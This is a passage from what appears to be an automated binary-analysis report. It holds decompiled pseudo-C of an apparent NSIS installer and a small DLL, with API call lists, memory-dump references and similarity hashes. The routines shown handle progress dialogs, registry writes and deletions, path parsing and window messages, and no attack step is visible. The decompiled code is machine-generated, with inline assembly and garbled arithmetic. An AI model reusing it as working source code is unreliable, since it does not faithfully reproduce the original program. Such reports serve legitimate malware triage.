                                                                                                  						_t7 = CreateDialogParamA( *0x7a27a0, 0x6f, 0, E00402B6E, 0);                           // 0x00402c8e
                                                                                                  						 *0x79594c = _t7;                                                                      // 0x00402c97
                                                                                                  						return ShowWindow(_t7, 5);                                                             // 0x00000000
                                                                                                  					}                                                                                          // 0x00402c9c
                                                                                                  					__eflags =  *0x7a2854 & 0x00000001;                                                        // 0x00402c52
                                                                                                  					if(( *0x7a2854 & 0x00000001) != 0) {                                                       // 0x00402c59
                                                                                                  						wsprintfA( &_v68, "... %d%%", E00402BEA());                                            // 0x00402c6a
                                                                                                  						return E00405010(0,  &_v68);                                                           // 0x00000000
                                                                                                  					}                                                                                          // 0x00402c78
                                                                                                  				}                                                                                              // 0x00402c59
                                                                                                  				return _t6;                                                                                    // 0x00402ca4
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402C1E
                                                                                                  • GetTickCount.KERNEL32 ref: 00402C3C
                                                                                                  • wsprintfA.USER32 ref: 00402C6A
                                                                                                    • Part of subcall function 00405010: lstrlenA.KERNEL32(0079E578,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C7D,00000000,?), ref: 00405049
                                                                                                    • Part of subcall function 00405010: lstrlenA.KERNEL32(00402C7D,0079E578,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C7D,00000000), ref: 00405059
                                                                                                    • Part of subcall function 00405010: lstrcatA.KERNEL32(0079E578,00402C7D,00402C7D,0079E578,00000000,00000000,00000000), ref: 0040506C
                                                                                                    • Part of subcall function 00405010: SetWindowTextA.USER32(0079E578,0079E578), ref: 0040507E
                                                                                                    • Part of subcall function 00405010: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050A4
                                                                                                    • Part of subcall function 00405010: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050BE
                                                                                                    • Part of subcall function 00405010: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050CC
                                                                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C8E
                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C9C
                                                                                                    • Part of subcall function 00402BEA: MulDiv.KERNEL32(00000000,00000064,?), ref: 00402BFF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                  • String ID: ... %d%%
                                                                                                  • API String ID: 722711167-2449383134
                                                                                                  • Opcode ID: 765b7d7f9f74b859da686acef26b6715f16038be255b616ea619fc253c2165e8
                                                                                                  • Instruction ID: 5665fb5ac19c2ca49a5ebccfe187302435367b741666495adcc36f42171ef0ef
                                                                                                  • Opcode Fuzzy Hash: 765b7d7f9f74b859da686acef26b6715f16038be255b616ea619fc253c2165e8
                                                                                                  • Instruction Fuzzy Hash: 65016530809234EBD7216F65AE0DA5F7768EB01725714807BF501F11D1D6BC6942CB9F
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
E004048DF(struct HWND__* _a4, intOrPtr _a8) {
	long _v8;
	signed char _v12;
	unsigned int _v16;
	void* _v20;
	intOrPtr _v24;
	long _v56;
	void* _v60;
	long _t15;
	unsigned int _t19;
	signed int _t25;
	struct HWND__* _t28;

	_t28 = _a4;
	_t15 = SendMessageA(_t28, 0x110a, 9, 0);
	if(_a8 == 0) {
		L4:
		_v56 = _t15;
		_v60 = 4;
		SendMessageA(_t28, 0x110c, 0,  &_v60);
		return _v24;
	}
	_t19 = GetMessagePos();
	_v16 = _t19 >> 0x10;
	_v20 = _t19;
	ScreenToClient(_t28,  &_v20);
	_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
	if((_v12 & 0x00000066) != 0) {
		_t15 = _v8;
		goto L4;
	}
	return _t25 | 0xffffffff;
}

0x004048ed
0x004048fa
0x00404900
0x0040493e
0x0040493e
0x0040494d
0x00404954
0x00000000
0x00404956
0x00404902
0x00404911
0x00404919
0x0040491c
0x0040492e
0x00404934
0x0040493b
0x00000000
0x0040493b
0x00000000

APIs
• SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048FA
• GetMessagePos.USER32 ref: 00404902
• ScreenToClient.USER32 ref: 0040491C
• SendMessageA.USER32(?,00001111,00000000,?), ref: 0040492E
• SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404954
Strings
Memory Dump Source
• Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
• Instruction ID: 62be087ef55917f0637de33650f1910d5268ec9c7ce2adda7b9574df75a0d37a
• Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
• Instruction Fuzzy Hash: 16019271D00219BADB00DBA4DC41BFFBBBCAB45711F10012BBB50B61D0C3B465018BA5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
	char _v68;
	void* _t11;
	CHAR* _t19;

	if(_a8 == 0x110) {
		SetTimer(_a4, 1, 0xfa, 0);
		_a8 = 0x113;
	}
	if(_a8 == 0x113) {
		_t11 = E00402BEA();
		_t19 = "unpacking data: %d%%";
		if( *0x7a27b0 == 0) {
			_t19 = "verifying installer: %d%%";
		}
		wsprintfA( &_v68, _t19, _t11);
		SetWindowTextA(_a4,  &_v68);
		SetDlgItemTextA(_a4, 0x406,  &_v68);
	}
	return 0;
}

0x00402b7b
0x00402b89
0x00402b8f
0x00402b8f
0x00402b9d
0x00402b9f
0x00402bab
0x00402bb0
0x00402bb2
0x00402bb2
0x00402bbd
0x00402bcd
0x00402bdf
0x00402bdf
0x00402be7

APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
• wsprintfA.USER32 ref: 00402BBD
• SetWindowTextA.USER32(?,?), ref: 00402BCD
• SetDlgItemTextA.USER32 ref: 00402BDF
Strings
Memory Dump Source
• Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: unpacking data: %d%%$verifying installer: %d%%
• API String ID: 1451636040-1158693248
• Opcode ID: b9951a27a0ad3d4b637c0e4defd9dd6d062304ffd2d4b199425f9ab5ec9f44a2
• Instruction ID: 5f0132f46f34ad66c666b6fba235fd2f19fc14380ecad722e005febefb47bc85
• Opcode Fuzzy Hash: b9951a27a0ad3d4b637c0e4defd9dd6d062304ffd2d4b199425f9ab5ec9f44a2
• Instruction Fuzzy Hash: BCF0127090420DAAEF215F50DD09FAA3779EB10345F00807AF606A51D1D7B899559B99
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 33%
E100010F1(void* __eax, signed int __edi, void* __esi) {
	void* _t6;

	 *(__esi + 0x3a) =  *(__esi + 0x3a) | __edi;
	0x10004b24->X = 0x14001e;
	SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0x10004b24);
	_t6 = E10001690();
	__imp___getch("Game Draw");
	exit(0);
	return _t6;
}

0x100010f6
0x100010f9
0x10001112
0x1000111d
0x10001125
0x1000112d
0x10001133

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp
• Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp
• Associated: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp
• Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp
Similarity
• API ID: ConsoleCursorHandlePosition_getch_printfexit
• String ID: Game Draw
• API String ID: 2945803984-3265694624
• Opcode ID: 08cc9d3747876e57dbf9f12d13a1dd0fd919f660a19213ca8aac68ad53072683
• Instruction ID: 7f86a1bc56cf6df7890533edaa720a2800b1fa09b60be95265b06f4c224d7dc9
• Opcode Fuzzy Hash: 08cc9d3747876e57dbf9f12d13a1dd0fd919f660a19213ca8aac68ad53072683
• Instruction Fuzzy Hash: 8DD012B5800320DBFA019B908FCD7193BA8FB0C3C2F104605F312C147ACB719004CB26
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 90%
E00402336(void* __eax) {
	void* _t15;
	char* _t18;
	int _t19;
	char _t24;
	int _t27;
	intOrPtr _t35;
	void* _t37;

	_t15 = E00402B1E(__eax);
	_t35 =  *((intOrPtr*)(_t37 - 0x18));
	 *(_t37 - 0x34) =  *(_t37 - 0x14);
	 *(_t37 - 0x38) = E00402A29(2);
	_t18 = E00402A29(0x11);
	_t31 =  *0x7a2850 | 0x00000002;
	 *(_t37 - 4) = 1;
	_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x7a2850 | 0x00000002, _t27, _t37 + 8, _t27);
	if(_t19 == 0) {
		if(_t35 == 1) {
			E00402A29(0x23);
			_t19 = lstrlenA(0x40a430) + 1;
		}
		if(_t35 == 4) {
			_t24 = E00402A0C(3);
			 *0x40a430 = _t24;
			_t19 = _t35;
		}
		if(_t35 == 3) {
			_t19 = E00402F4E(_t31,  *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a430, 0xc00);
		}
		if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a430, _t19) == 0) {
			 *(_t37 - 4) = _t27;
		}
		_push( *(_t37 + 8));
		RegCloseKey();
	}
                                                                                                  				 *0x7a2828 =  *0x7a2828 +  *(_t37 - 4);
                                                                                                  				return 0;
			}

                                                                                                  APIs
                                                                                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402374
                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402394
                                                                                                  • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CD
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024B0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateValuelstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp
                                                                                                  • API String ID: 1356686001-1451364421
                                                                                                  • Opcode ID: 0799274cdccd58945ada5092e48339c69ac5974a051479cf60ecbd445f06ba6f
                                                                                                  • Instruction ID: 3349b4e08413610a29dfd3a1d4734fa3136aed4631e94ee9e9a992f937961cdc
                                                                                                  • Opcode Fuzzy Hash: 0799274cdccd58945ada5092e48339c69ac5974a051479cf60ecbd445f06ba6f
                                                                                                  • Instruction Fuzzy Hash: 0611AF71E00208BEEB11EFA5DE89EAF7A78EB44758F20403AF505B71D1C6BC5D019B69
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 84%
                                                                                                  			E00402A69(void* _a4, char* _a8, intOrPtr _a12) {
                                                                                                  				void* _v8;
                                                                                                  				char _v272;
                                                                                                  				long _t18;
                                                                                                  				intOrPtr* _t27;
                                                                                                  				long _t28;
                                                                                                  
                                                                                                  				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x7a2850 | 0x00000008,  &_v8);
                                                                                                  				if(_t18 == 0) {
                                                                                                  					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                                                  						if(_a12 != 0) {
                                                                                                  							RegCloseKey(_v8);
                                                                                                  							L8:
                                                                                                  							return 1;
                                                                                                  						}
                                                                                                  						if(E00402A69(_v8,  &_v272, 0) != 0) {
                                                                                                  							break;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					RegCloseKey(_v8);
                                                                                                  					_t27 = E004060B4(4);
                                                                                                  					if(_t27 == 0) {
                                                                                                  						if( *0x7a2850 != 0) {
                                                                                                  							goto L8;
                                                                                                  						}
                                                                                                  						_t28 = RegDeleteKeyA(_a4, _a8);
                                                                                                  						if(_t28 != 0) {
                                                                                                  							goto L8;
                                                                                                  						}
                                                                                                  						return _t28;
                                                                                                  					}
                                                                                                  					return  *_t27(_a4, _a8,  *0x7a2850, 0);
                                                                                                  				}
                                                                                                  				return _t18;
			}

                                                                                                  APIs
                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A8A
                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1912718029-0
                                                                                                  • Opcode ID: 005aa08e09fa2f9c52acd8c6437f754bb1c3413ee6afae27746e5cf1dc3646d6
                                                                                                  • Instruction ID: 394a2bb0538aac42cd1eb94d6c751ba431b5215abe904c7dfb851c8138e3e268
                                                                                                  • Opcode Fuzzy Hash: 005aa08e09fa2f9c52acd8c6437f754bb1c3413ee6afae27746e5cf1dc3646d6
                                                                                                  • Instruction Fuzzy Hash: 18114C71600049FFDF21AF94DE88DAB3BB9FB44344B104076FA05A11A0DBB89E51BF69
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00401CDE(int __edx) {
                                                                                                  				void* _t17;
                                                                                                  				struct HINSTANCE__* _t21;
                                                                                                  				struct HWND__* _t25;
                                                                                                  				void* _t27;
                                                                                                  
                                                                                                  				_t25 = GetDlgItem( *(_t27 - 8), __edx);
                                                                                                  				GetClientRect(_t25, _t27 - 0x50);
                                                                                                  				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
                                                                                                  				if(_t17 != _t21) {
                                                                                                  					DeleteObject(_t17);
                                                                                                  				}
                                                                                                  				 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t27 - 4));
                                                                                                  				return 0;
			}

                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32 ref: 00401CE2
                                                                                                  • GetClientRect.USER32 ref: 00401CEF
                                                                                                  • LoadImageA.USER32 ref: 00401D10
                                                                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 1849352358-0
                                                                                                  • Opcode ID: 9db6bf3c7710e3760e37a38e8ca944551d0cf4879471460eea63859595bb1064
                                                                                                  • Instruction ID: f357bcee20db6ba17ef42ec5628d3685bdee74f64b72a6fb3616790656fe102c
                                                                                                  • Opcode Fuzzy Hash: 9db6bf3c7710e3760e37a38e8ca944551d0cf4879471460eea63859595bb1064
                                                                                                  • Instruction Fuzzy Hash: 9BF0EC72A04118AFDB01EBA4DE88DAFB7BCEB49315B14442AF501F6191C7789D019B79
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004058AB(char _a4) {
                                                                                                  				CHAR* _t3;
                                                                                                  				char* _t5;
                                                                                                  				CHAR* _t7;
                                                                                                  				CHAR* _t8;
                                                                                                  				void* _t10;
                                                                                                  
                                                                                                  				_t1 =  &_a4; // 0x40565d
                                                                                                  				_t8 =  *_t1;
                                                                                                  				_t7 = CharNextA(_t8);
                                                                                                  				_t3 = CharNextA(_t7);
                                                                                                  				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                                                                                                  					if( *_t8 != 0x5c5c) {
                                                                                                  						L8:
                                                                                                  						return 0;
                                                                                                  					}
                                                                                                  					_t10 = 2;
                                                                                                  					while(1) {
                                                                                                  						_t10 = _t10 - 1;
                                                                                                  						_t5 = E00405842(_t3, 0x5c);
                                                                                                  						if( *_t5 == 0) {
                                                                                                  							goto L8;
                                                                                                  						}
                                                                                                  						_t3 = _t5 + 1;
                                                                                                  						if(_t10 != 0) {
                                                                                                  							continue;
                                                                                                  						}
                                                                                                  						return _t3;
                                                                                                  					}
                                                                                                  					goto L8;
                                                                                                  				} else {
                                                                                                  					return CharNextA(_t3);
                                                                                                  				}
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • CharNextA.USER32(]V@,?,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000000,0040590F,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,?,?,7519F560,0040565D,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 004058B9
                                                                                                  • CharNextA.USER32(00000000), ref: 004058BE
                                                                                                  • CharNextA.USER32(00000000), ref: 004058CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: CharNext
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp$]V@
                                                                                                  • API String ID: 3213498283-3407668387
                                                                                                  • Opcode ID: 821b75fc0c0bf8a8a2143e6ed4d527e8d42290358c57660450d09f70a8aefd19
                                                                                                  • Instruction ID: 4d129233157b146d8e872c92a1fb7bbd55967a494d67b6c0b16af7eb119e1d1b
                                                                                                  • Opcode Fuzzy Hash: 821b75fc0c0bf8a8a2143e6ed4d527e8d42290358c57660450d09f70a8aefd19
                                                                                                  • Instruction Fuzzy Hash: 8FF0AE53904B215AD72272544C48B67679CDF59710F148477ED01761D1C7784C62DFAA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 77%
                                                                                                  			E004047D5(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                                  				char _v36;
                                                                                                  				char _v68;
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				signed int _t21;
                                                                                                  				signed int _t22;
                                                                                                  				void* _t29;
                                                                                                  				void* _t31;
                                                                                                  				void* _t32;
                                                                                                  				void* _t41;
                                                                                                  				signed int _t43;
                                                                                                  				signed int _t47;
                                                                                                  				signed int _t50;
                                                                                                  				signed int _t51;
                                                                                                  				signed int _t53;
                                                                                                  
                                                                                                  				_t21 = _a16;
                                                                                                  				_t51 = _a12;
                                                                                                  				_t41 = 0xffffffdc;
                                                                                                  				if(_t21 == 0) {
                                                                                                  					_push(0x14);
                                                                                                  					_pop(0);
                                                                                                  					_t22 = _t51;
                                                                                                  					if(_t51 < 0x100000) {
                                                                                                  						_push(0xa);
                                                                                                  						_pop(0);
                                                                                                  						_t41 = 0xffffffdd;
                                                                                                  					}
                                                                                                  					if(_t51 < 0x400) {
                                                                                                  						_t41 = 0xffffffde;
                                                                                                  					}
                                                                                                  					if(_t51 < 0xffff3333) {
                                                                                                  						_t50 = 0x14;
                                                                                                  						asm("cdq");
                                                                                                  						_t22 = 1 / _t50 + _t51;
                                                                                                  					}
                                                                                                  					_t23 = _t22 & 0x00ffffff;
                                                                                                  					_t53 = _t22 >> 0;
                                                                                                  					_t43 = 0xa;
                                                                                                  					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                                                                  				} else {
                                                                                                  					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                                                                  					_t47 = 0;
                                                                                                  				}
                                                                                                  				_t29 = E00405D46(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                                                                  				_t31 = E00405D46(_t41, _t47, _t53,  &_v68, _t41);
                                                                                                  				_t32 = E00405D46(_t41, _t47, 0x79eda0, 0x79eda0, _a8);
                                                                                                  				wsprintfA(_t32 + lstrlenA(0x79eda0), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                                                                  				return SetDlgItemTextA( *0x7a1f78, _a4, 0x79eda0);
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(0079EDA0,0079EDA0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046F0,000000DF,00000000,00000400,?), ref: 00404873
                                                                                                  • wsprintfA.USER32 ref: 0040487B
                                                                                                  • SetDlgItemTextA.USER32 ref: 0040488E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                  • String ID: %u.%u%s%s
                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                  • Opcode ID: 166d137e0e59de8ba4af0be59264fec3128c6706bff2ec62916a8c3abc91789b
                                                                                                  • Instruction ID: c818b1e70858d91ccef1adc2f5c344326f749079c396b39bf243287ce07d4cbc
                                                                                                  • Opcode Fuzzy Hash: 166d137e0e59de8ba4af0be59264fec3128c6706bff2ec62916a8c3abc91789b
                                                                                                  • Instruction Fuzzy Hash: FF110D73A041283BDB00656D9C45EAF3299DF82374F254637FA25F71D1E978CC1285E8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 51%
                                                                                                  			E00401BCA() {
                                                                                                  				signed int _t28;
                                                                                                  				CHAR* _t31;
                                                                                                  				long _t32;
                                                                                                  				int _t37;
                                                                                                  				signed int _t38;
                                                                                                  				int _t42;
                                                                                                  				int _t48;
                                                                                                  				struct HWND__* _t52;
                                                                                                  				void* _t55;
                                                                                                  
                                                                                                  				 *(_t55 - 8) = E00402A0C(3);
                                                                                                  				 *(_t55 + 8) = E00402A0C(4);
                                                                                                  				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
                                                                                                  					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
                                                                                                  				}
                                                                                                  				__eflags =  *(_t55 - 0x14) & 0x00000002;
                                                                                                  				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
                                                                                                  					 *(_t55 + 8) = E00402A29(0x44);
                                                                                                  				}
                                                                                                  				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
                                                                                                  				_push(1);
                                                                                                  				if(__eflags != 0) {
                                                                                                  					_t50 = E00402A29();
                                                                                                  					_t28 = E00402A29();
                                                                                                  					asm("sbb ecx, ecx");
                                                                                                  					asm("sbb eax, eax");
                                                                                                  					_t31 =  ~( *_t27) & _t50;
                                                                                                  					__eflags = _t31;
                                                                                                  					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                                                                                  					goto L10;
                                                                                                  				} else {
                                                                                                  					_t52 = E00402A0C();
                                                                                                  					_t37 = E00402A0C();
                                                                                                  					_t48 =  *(_t55 - 0x14) >> 2;
                                                                                                  					if(__eflags == 0) {
                                                                                                  						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
                                                                                                  						L10:
                                                                                                  						 *(_t55 - 0xc) = _t32;
                                                                                                  					} else {
                                                                                                  						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
                                                                                                  						asm("sbb eax, eax");
                                                                                                  						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
                                                                                                  				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
                                                                                                  					_push( *(_t55 - 0xc));
                                                                                                  					E00405C82();
                                                                                                  				}
                                                                                                  				 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t55 - 4));
                                                                                                  				return 0;
                                                                                                  			}













                                                                                                  APIs
                                                                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Timeout
                                                                                                  • String ID: !
                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                  • Opcode ID: 22602105ab14657b2362ab5c47f3abd445806e463df63d8c41bd3ddf5184478f
                                                                                                  • Instruction ID: b8410fb8c8eb49779d085b48b9517962e6f6c5e8148992f4dbb50a9136c29d8e
                                                                                                  • Opcode Fuzzy Hash: 22602105ab14657b2362ab5c47f3abd445806e463df63d8c41bd3ddf5184478f
                                                                                                  • Instruction Fuzzy Hash: 9A21A471A44149BEEF029FF4C94AAEE7B75DF44704F10407EF501B61D1DAB88540DB29
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 61%
                                                                                                  			E10001780(void* __eflags) {
                                                                                                  				signed int _v8;
                                                                                                  				void* _t12;
